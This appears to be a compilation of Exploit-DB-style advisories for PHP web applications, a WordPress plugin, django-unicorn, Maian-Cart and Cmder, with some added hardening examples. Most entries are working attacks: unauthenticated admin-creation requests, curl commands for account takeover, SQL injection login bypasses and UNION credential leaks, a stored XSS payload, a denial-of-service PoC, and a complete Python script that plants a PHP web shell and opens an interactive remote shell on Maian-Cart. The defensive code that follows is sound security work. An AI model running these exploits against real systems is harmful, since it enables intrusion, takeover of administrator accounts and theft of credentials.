Content-Length: 42
Connection: close
Content-Type: text/html; charset=UTF-8

Hacked other client files in this hosting!

-----------------------------------------------------------------------------------------------------------------------

## Example 4 - Performing operations by an unauthenticated user with application administrator rights
# The application allows you to perform many operations without authorization; the application has no permission matrix. The entire application is vulnerable.

# Request adding new admin user to application by sending a request by an authorized user
POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
Content-Length: 949
Origin: http://localhost
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="id"

21
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="firstname"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="lastname"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="username"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="password"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="type"

1
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="img"; filename="aaa.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
-----------------------------210106920639395210803657370685--

-----------------------------------------------------------------------------------------------------------------------

# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:50:36 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=2l1p4103dtj3j3vrod0t6rk6pn; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

# The request worked fine, log into the app using your hack account
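Both Online Traffic Offense Management System posts above come down to the same two defects in the upload handlers: the file name and type are taken from the client (so cmd.php lands in uploads/ and is executed), and the record id is spliced into the on-disk path (so 5/../../../index overwrites index.php). The following is an added example of how a hardened handler for save_driver / Users.php?f=save would look; it is not the application's own code. It assumes the upload arrives as $_FILES['img'], the record id as $_POST['id'], a fixed uploads/drivers directory, and a session variable admin_id set by the login code; all of those names are assumptions.

```php
<?php
// Added example (not the application's own code): a hardened replacement for the
// image-upload and record-id handling that the two Traffic Offense advisories abuse.
// Assumed names: $_FILES['img'], $_POST['id'], $_SESSION['admin_id'], uploads/drivers.

declare(strict_types=1);

const UPLOAD_DIR   = __DIR__ . '/uploads/drivers';   // fixed; never derived from request input
const MAX_BYTES    = 2 * 1024 * 1024;
// Type is decided from the detected MIME type, and the extension is chosen from this map.
// SVG is deliberately absent: it is active content and the XSS post above uses exactly that.
const ALLOWED_MIME = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

/** Accepts only a plain decimal id; "5/../../../index" style values are rejected. */
function validate_record_id(string $raw): ?int
{
    return ctype_digit($raw) ? (int) $raw : null;
}

/** Validates one entry of $_FILES and stores it under a server-chosen name; returns the path. */
function store_uploaded_image(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    // Decide the type from the bytes, not from the client-supplied filename or Content-Type
    // (the advisories send cmd.php with Content-Type: image/png or application/octet-stream).
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_MIME[$mime])) {
        throw new RuntimeException('unsupported image type');
    }
    // Second check: it must actually decode as an image.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }
    // Random server-chosen name; extension comes from the detected type, never from the client.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_MIME[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $dest;
}

// Request handling: authentication first, then the id, then the file.
session_start();
if (empty($_SESSION['admin_id'])) {          // the advisories show every endpoint skipping this
    http_response_code(403);
    exit;
}
$id = validate_record_id((string) ($_POST['id'] ?? ''));
if ($id === null) {
    http_response_code(400);
    exit('invalid id');
}
try {
    $path = store_uploaded_image($_FILES['img'] ?? []);
    echo json_encode(['status' => 'success', 'file' => basename($path)]);
} catch (RuntimeException $e) {
    http_response_code(400);
    echo json_encode(['status' => 'failed', 'msg' => $e->getMessage()]);
}
```

Two server-side settings belong with this: the uploads directory should have PHP execution disabled (so that even a file that slips through is served as bytes, not run), and directory listing should be off; the "Index of /traffic_offense/uploads" response in the RCE post shows Apache autoindex enabled on exactly that directory, which is what let the author find the stored file name.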
-
Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation
# Exploit Title: Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation
# Date: 07.10.2021
# Exploit Author: Amine ismail @aminei_
# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux

# Unauthenticated admin creation

Unauthenticated admin creation:

Request:

POST /entrance_exam/Actions.php?a=save_admin HTTP/1.1
Host: 127.0.0.1
Content-Length: 42

id=&fullname=admin2&username=admin2&type=1

PoC to create an admin user named exploitdb and password exploitdb:

curl -d "id=&fullname=admin&username=exploitdb&type=1&password=916b5dbd201b469998d9b4a4c8bc4e08" -X POST 'http://127.0.0.1/entrance_exam/Actions.php?a=save_admin'
-
WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated)
# Exploit Title: WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated)
# Google Dork: inurl:/plugins/pie-register/
# Date: 08.10.2021
# Exploit Author: Lotfi13-DZ
# Vendor Homepage: https://wordpress.org/plugins/pie-register/
# Software Link: https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip
# Version: <= 3.7.1.4
# Tested on: ubuntu

Vulnerable arg: [user_id_social_site=1] <== will return the authentication cookies for user 1 (admin).

Exploit:

wget -q -S -O - http://localhost/ --post-data 'user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null' > /dev/null
-
Simple Online College Entrance Exam System 1.0 - Account Takeover
# Exploit Title: Simple Online College Entrance Exam System 1.0 - Account Takeover
# Date: 07.10.2021
# Exploit Author: Amine ismail @aminei_
# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux

# Unauthenticated password change leading to account takeover

Explanation: By sending the old_password parameter as an array, md5() returns null, so md5($old_password) == $_SESSION['password'] holds since we have no session, which bypasses the check; after that we can use SQLi to inject our custom data.

Request:

POST /entrance_exam/Actions.php?a=update_credentials HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 129

id=4&username=test',`password`='916b5dbd201b469998d9b4a4c8bc4e08'+WHERE+admin_id=4;%23&password=commented_out&old_password[]=test

Vulnerable code in Actions.php:

function update_credentials(){
    extract($_POST);
    $data = "";
    foreach($_POST as $k => $v){
        if(!in_array($k,array('id','old_password')) && !empty($v)){
            if(!empty($data)) $data .= ",";
            if($k == 'password') $v = md5($v);
            $data .= " `{$k}` = '{$v}' ";
        }
    }
    ...
    if(!empty($password) && md5($old_password) != $_SESSION['password']){
        $resp['status'] = 'failed';
        $resp['msg'] = "Old password is incorrect.";
    }else{
        $sql = "UPDATE `admin_list` set {$data} where admin_id = '{$_SESSION['admin_id']}'";
        @$save = $this->query($sql);

PoC that changes the password and username of user 'admin' to 'exploitdb':

curl -d "username=exploitdb',%60password%60='916b5dbd201b469998d9b4a4c8bc4e08' WHERE admin_id=1;%23&password=useless&old_password[]=useless" -X POST 'http://127.0.0.1/entrance_exam/Actions.php?a=update_credentials'
-
django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)
# Exploit Title: django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)
# Date: 10/7/21
# Exploit Author: Raven Security Associates, Inc. (ravensecurity.net)
# Software Link: https://pypi.org/project/django-unicorn/
# Version: <= 0.35.3
# CVE: CVE-2021-42053

django-unicorn <= 0.35.3 suffers from a stored XSS vulnerability by improperly escaping data from AJAX requests.

Step 1: Go to www.django-unicorn.com/unicorn/message/todo
Step 2: Enter an XSS payload in the todo form (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet).

POC:

POST /unicorn/message/todo HTTP/2
Host: www.django-unicorn.com
Cookie: csrftoken=EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z
Content-Length: 258
Sec-Ch-Ua: ";Not A Brand";v="99", "Chromium";v="94"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: application/json
X-Requested-With: XMLHttpRequest
X-Csrftoken: EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z
Sec-Ch-Ua-Platform: "Linux"
Origin: https://www.django-unicorn.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.django-unicorn.com/examples/todo
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{"id":"Q43GSmJh","data":{"task":"","tasks":[]},"checksum":"4ck2yTwX","actionQueue":[{"type":"syncInput","payload":{"name":"task","value":"<img src=x onerror=alert(origin)>"}},{"type":"callMethod","payload":{"name":"add"},"partial":{}}],"epoch":1633578678871}

-----------------------------------------------------------------------

HTTP/2 200 OK
Date: Thu, 07 Oct 2021 03:51:18 GMT
Content-Type: application/json
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Via: 1.1 vegur
Cf-Cache-Status: DYNAMIC
Expect-Ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b4nQavto8LK9ru7JfhbNimKP71ZlMtduJTy6peHCwxDVWBH2Mkn0f7O%2FpWFy1FgPTd6Z6FmfkYUw5Izn59zN6kTQmjNjddiPWhWCWZWwOFiJf45ESQxuxr44UeDv3w51h1Ri6ESnNE5Y"}],"group":"cf-nel","max_age":604800}
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
Cf-Ray: 69a42b973f6a6396-ORD
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

{"id": "Q43GSmJh", "data": {"tasks": ["<img src=x onerror=alert(origin)>"]}, "errors": {}, "checksum": "ZQn54Ct4", "dom": "<div unicorn:id=\"Q43GSmJh\" unicorn:name=\"todo\" unicorn:key=\"\" unicorn:checksum=\"ZQn54Ct4\">\n<form unicorn:submit.prevent=\"add\">\n<input type=\"text\" unicorn:model.lazy=\"task\" placeholder=\"New task\" id=\"task\"/>\n</form>\n<button unicorn:click=\"add\">Add</button>\n<p>\n<ul>\n<li><img src=x onerror=alert(origin)></li>\n</ul>\n<button unicorn:click=\"$reset\">Clear all tasks</button>\n</p>\n</div>\n", "return": {"method": "add", "params": [], "value": null}}
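The tell in the capture above is the `dom` field of the JSON response: the `<img ...>` string comes back verbatim inside `<li>...</li>` instead of as `&lt;img ...&gt;`. The following is an added example, not part of the advisory or of django-unicorn: it builds the same message body (a `syncInput` that sets `task` to the payload, followed by a `callMethod` for `add`) for any payload, sends it the way the browser does, and classifies the returned `dom` as unescaped, escaped or absent. The component id and checksum are taken from the capture as placeholders; a live target needs the values its own page serves, since django-unicorn validates the checksum. The sample response embedded at the bottom is a trimmed, constructed copy of the captured one for offline checks.

```python
"""Added example (not from the advisory): build the django-unicorn message for
a payload and check whether the rendered dom reflects it unescaped."""
import html
import json
import time
from urllib.request import Request, urlopen

PAYLOAD = "<img src=x onerror=alert(origin)>"


def build_message(component_id, checksum, payload, data=None, epoch=None):
    """JSON body POSTed to /unicorn/message/<component>: sync the 'task' input
    to the payload, then call the component's add() method."""
    return {
        "id": component_id,
        "data": data if data is not None else {"task": "", "tasks": []},
        "checksum": checksum,
        "actionQueue": [
            {"type": "syncInput", "payload": {"name": "task", "value": payload}},
            {"type": "callMethod", "payload": {"name": "add"}, "partial": {}},
        ],
        "epoch": epoch if epoch is not None else int(time.time() * 1000),
    }


def classify_reflection(dom, payload):
    """'unescaped' when the payload is in the dom verbatim (exploitable),
    'escaped' when only its HTML-escaped form is there, 'absent' otherwise."""
    if payload in dom:
        return "unescaped"
    if html.escape(payload, quote=False) in dom:
        return "escaped"
    return "absent"


def reflected_unescaped(response_json, payload):
    return classify_reflection(response_json.get("dom", ""), payload) == "unescaped"


def send_message(base_url, component, message, csrftoken):
    """POST as the browser does: JSON body, X-CSRFToken header and the matching
    csrftoken cookie (Django checks the two against each other)."""
    req = Request(
        f"{base_url}/unicorn/message/{component}",
        data=json.dumps(message).encode(),
        method="POST",
        headers={
            "Content-Type": "text/plain;charset=UTF-8",
            "Accept": "application/json",
            "X-Requested-With": "XMLHttpRequest",
            "X-CSRFToken": csrftoken,
            "Cookie": f"csrftoken={csrftoken}",
        },
    )
    with urlopen(req, timeout=10) as resp:
        return json.loads(resp.read().decode())


# Constructed, trimmed copy of the dom in the captured response, for offline use.
SAMPLE_RESPONSE = {
    "id": "Q43GSmJh",
    "data": {"tasks": [PAYLOAD]},
    "checksum": "ZQn54Ct4",
    "dom": ('<div unicorn:id="Q43GSmJh" unicorn:name="todo">\n<ul>\n'
            f'<li>{PAYLOAD}</li>\n</ul>\n</div>\n'),
}

if __name__ == "__main__":
    msg = build_message("Q43GSmJh", "4ck2yTwX", PAYLOAD, epoch=1633578678871)
    print(json.dumps(msg))
    print("sample response:", classify_reflection(SAMPLE_RESPONSE["dom"], PAYLOAD))
```

Against a live instance, call `send_message(...)` with the id/checksum/csrftoken read from the page and feed the result to `reflected_unescaped`; a fixed version (0.36.0 and later) should yield "escaped" for the same payload.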
-
Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit title: Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 27.11.2020 19:35
# Tested on: Ubuntu 20.04 LTS
# Exploit Author(s): DreyAnd, purpl3
# Software Link: https://www.maiancart.com/download.html
# Vendor homepage: https://www.maianscriptworld.co.uk/
# Version: Maian Cart 3.8
# CVE: CVE-2021-32172

#!/usr/bin/python3
import argparse
import json
import sys
import time

import requests

parser = argparse.ArgumentParser()
parser.add_argument("host", help="Host to exploit (with http/https prefix)")
parser.add_argument("dir", nargs="?", default="/",
                    help="starting directory of the maian-cart instance (default: /); "
                         "sometimes it is placed at /cart or /maiancart")
args = parser.parse_args()

host = args.host.rstrip("/")
directory = args.dir.rstrip("/")  # "/" -> "", "/cart" -> "/cart"
elfinder = f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder"
exec_host = f"{host}{directory}/product-downloads/shell.php"


def connection_error():
    print("\033[91mThere was a connection issue. Check if you're connected to wifi or if the host is correct\033[00m")
    sys.exit(1)


# CREATE THE FILE
print("\033[95mCreating the file to write payload to...\n\033[00m", flush=True)
time.sleep(1)
try:
    # unauthenticated elFinder connector: mkfile in the root volume
    # ("l1_Lw" is the elFinder hash: volume id l1 + base64 of "/")
    r = requests.get(f"{elfinder}&cmd=mkfile&name=shell.php&target=l1_Lw")
except requests.exceptions.RequestException:
    connection_error()
print(r.text)
if "added" in r.text:
    print("\033[95mFile successfully created.\n\033[00m")
else:
    print("\033[91mSome error occurred.\033[00m")
    sys.exit(1)

# GET THE FILE ID (the connector answers with JSON listing the new file's hash)
time.sleep(1)
file_id = json.loads(r.text)["added"][0]["hash"]
print("\033[95mGot the file id: ", "\033[91m", file_id, "\033[00m\n")

# WRITE TO THE FILE
print("\033[95mWriting the payload to the file...\033[00m\n")
time.sleep(1)
headers = {
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "Accept-Language": "en-US,en;q=0.5",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Connection": "keep-alive",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache",
}
# content is the URL-encoded form of: <?php system($_GET["cmd"]) ?>
data = f"cmd=put&target={file_id}&content=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%20%3F%3E"
try:
    write = requests.post(elfinder, headers=headers, data=data)
except requests.exceptions.RequestException:
    connection_error()
print(write.text)

# EXECUTE THE PAYLOAD
print("\033[95mExecuting the payload...\033[00m\n")
time.sleep(1)
print(f"\033[92mGetting a shell. To stop it, press CTRL + C. Browser url: {exec_host}?cmd=\033[00m")
time.sleep(2)


def run(command):
    # params= URL-encodes the command, so spaces and shell metacharacters survive
    return requests.get(exec_host, params={"cmd": command}).text


def remove_shell():
    remove = requests.get(f"{elfinder}&cmd=rm&targets%5B%5D={file_id}")
    print("\033[91m", remove.text, "\033[00m")


while True:
    try:
        print(run(input("$ ")))
    except (KeyboardInterrupt, EOFError):
        print()
        if input("Do you really wish to exit? Y/N? ").strip().lower() == "y":
            print("\033[91mExit detected. Removing the shell...\033[00m")
            remove_shell()
            print("\033[91mBye!\033[00m")
            sys.exit(1)
-
Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC)
# Exploit Title: Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC)
# Date: 2021-10-07
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://cmder.net
# Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip
# Version: v1.3.18
# Tested on: Windows 10

# [About - Cmder Console Emulator] :
# Cmder is a software package created over the absence of a usable console emulator on Windows.
# It is based on ConEmu with a major config overhaul, comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout.

# [Security Issue] :
# Requires the execution of a .cmd file: the created file is run inside the emulator, which triggers the buffer overflow condition.
# E.g. λ cmder.cmd

# [POC] :
PAYLOAD = chr(235) + "\\CMDER"
PAYLOAD = PAYLOAD * 3000
with open("cmder.cmd", "w") as f:
    f.write(PAYLOAD)
-
Online Enrollment Management System 1.0 - Authentication Bypass
# Exploit Title: Online Enrollment Management System 1.0 - Authentication Bypass
# Date: 07.10.2021
# Exploit Author: Amine ismail @aminei_
# Vendor Homepage: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
# Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
# Version: 1.0
# Tested on: Windows 10, Kali Linux

# Admin panel authentication bypass

Admin panel authentication can be bypassed due to a SQL injection in the login form:

Request:

POST /OnlineEnrolmentSystem/admin/login.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 63
Cookie: PHPSESSID=jd2phsg2f7pvv2kfq3lgfkc98q

user_email=admin'+OR+1=1+LIMIT+1;--+-&user_pass=admin&btnLogin=

PoC:

curl -d "user_email=admin' OR 1=1 LIMIT 1;--+-&user_pass=junk&btnLogin=" -X POST http://127.0.0.1/OnlineEnrolmentSystem/admin/login.php
-
Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection
# Exploit Title: Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection
# Date: 07.10.2021
# Exploit Author: Amine ismail @aminei_
# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux

# Multiple SQL injections

The following PoCs will leak the admin username and password:

Unauthenticated:

http://127.0.0.1/entrance_exam/take_exam.php?id=%27+UNION+SELECT+1,username||%27;%27||password,3,4,5,6,7+FROM+admin_list;

Admin:

http://127.0.0.1/entrance_exam/admin/view_enrollee.php?id=1'+UNION+SELECT+1,2,3,4,5,6,password,username,9,10,11,12,13,14,15+FROM+admin_list;
-
Online Employees Work From Home Attendance System 1.0 - SQLi Authentication Bypass
# Exploit Title: Online Employees Work From Home Attendance System 1.0 - SQLi Authentication Bypass
# Date: 08.10.2021
# Exploit Author: Merve Oral
# Vendor Homepage: https://www.sourcecodester.com/php/14981/online-employees-work-home-attendance-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14981&title=Online+Employees+Work+From+Home+Attendance+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux

# Online Employees Work From Home Attendance System/Logs in a Web App v1.0

The login page can be bypassed with a simple SQLi in the username parameter.

Steps To Reproduce:

1 - Go to the login page http://localhost/audit_trail/login.php
2 - Enter the payload admin' or '1'='1 in the username field (without double quotes) and type anything in the password field.
3 - Click the "Login" button and you are logged in as administrator.

PoC

POST /wfh_attendance/Actions.php?a=login HTTP/1.1
Host: merve
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 40
Origin: http://merve
Connection: close
Referer: http://merve/wfh_attendance/admin/login.php
Cookie: PHPSESSID=55nnlgv0kg2qaki92o2s9vl5rq

username=admin'+or+'1'%3D'1&password=any
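The three SQL injection entries above (Online Enrollment Management System login bypass, Simple Online College Entrance Exam System UNION leak, and this attendance-system login bypass) all come down to two query shapes: a login query with the username concatenated in, and a record lookup with the id concatenated in. The following is an added example, not from any of the advisories: an in-memory SQLite model of both shapes that runs the advisories' payloads against constructed sample data, beside the parameterised form that closes the hole. The table and column names other than admin_list/username/password are invented for the model; the page does not show the applications' actual queries, and the Online Enrollment system is MySQL-backed rather than SQLite, though the bypass logic is identical. One adaptation: the advisories' payloads end in `;` and rely on PHP's SQLite3 extension preparing only the first statement and discarding the rest; Python's sqlite3 module refuses trailing text, so the model terminates its payloads with a `--` comment, which SQLite does understand (`#` is MySQL comment syntax, not SQLite).

```python
"""Added example (not from the advisories): SQLite model of the string-built
login and lookup queries behind the bypasses and the UNION leak, next to the
parameterised versions."""
import hashlib
import sqlite3


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def build_db():
    """Constructed sample data: one admin row and one seven-column exam row
    (seven columns so the advisory's 7-value UNION SELECT lines up)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE admin_list (admin_id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE exam_list (id INTEGER PRIMARY KEY, title TEXT, c3 TEXT, c4 TEXT,
                                c5 TEXT, c6 TEXT, c7 TEXT);
    """)
    db.execute("INSERT INTO admin_list VALUES (1, 'admin', ?)", (md5_hex("S3cret!"),))
    db.execute("INSERT INTO exam_list VALUES (1, 'Maths', 'a', 'b', 'c', 'd', 'e')")
    return db


def login_vulnerable(db, username, password):
    """Login query built by string formatting (hypothetical shape of the
    bypassed admin panels). Returns the matched username or None."""
    sql = (f"SELECT username FROM admin_list WHERE username = '{username}' "
           f"AND password = '{md5_hex(password)}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Same query with bound parameters: the payload is compared as a literal."""
    row = db.execute("SELECT username FROM admin_list WHERE username = ? AND password = ?",
                     (username, md5_hex(password))).fetchone()
    return row[0] if row else None


def take_exam_vulnerable(db, exam_id):
    """take_exam.php?id=-style lookup with the id concatenated into the query."""
    return db.execute(f"SELECT * FROM exam_list WHERE id = '{exam_id}'").fetchall()


def take_exam_safe(db, exam_id):
    return db.execute("SELECT * FROM exam_list WHERE id = ?", (exam_id,)).fetchall()


# Payloads from the advisories, adapted to end in '--' rather than ';' because
# Python's sqlite3 rejects trailing text after a statement (PHP's SQLite3 drops it).
BYPASS_OR_LIMIT = "admin' OR 1=1 LIMIT 1-- -"      # Online Enrollment Management System
BYPASS_TAUTOLOGY = "admin' or '1'='1"              # attendance system (needs no comment)
UNION_LEAK = "' UNION SELECT 1,username||';'||password,3,4,5,6,7 FROM admin_list--"


if __name__ == "__main__":
    db = build_db()
    print("vulnerable login, OR 1=1:", login_vulnerable(db, BYPASS_OR_LIMIT, "junk"))
    print("vulnerable login, tautology:", login_vulnerable(db, BYPASS_TAUTOLOGY, "any"))
    print("safe login, tautology:", login_safe(db, BYPASS_TAUTOLOGY, "any"))
    print("vulnerable lookup, UNION:", take_exam_vulnerable(db, UNION_LEAK))
    print("safe lookup, UNION:", take_exam_safe(db, UNION_LEAK))
```

The UNION row comes back as `admin;<md5>` in the second column, which is exactly the string the unauthenticated take_exam.php PoC displays on the page; the parameterised lookup returns nothing for the same input because `?` binds the whole payload as the id value.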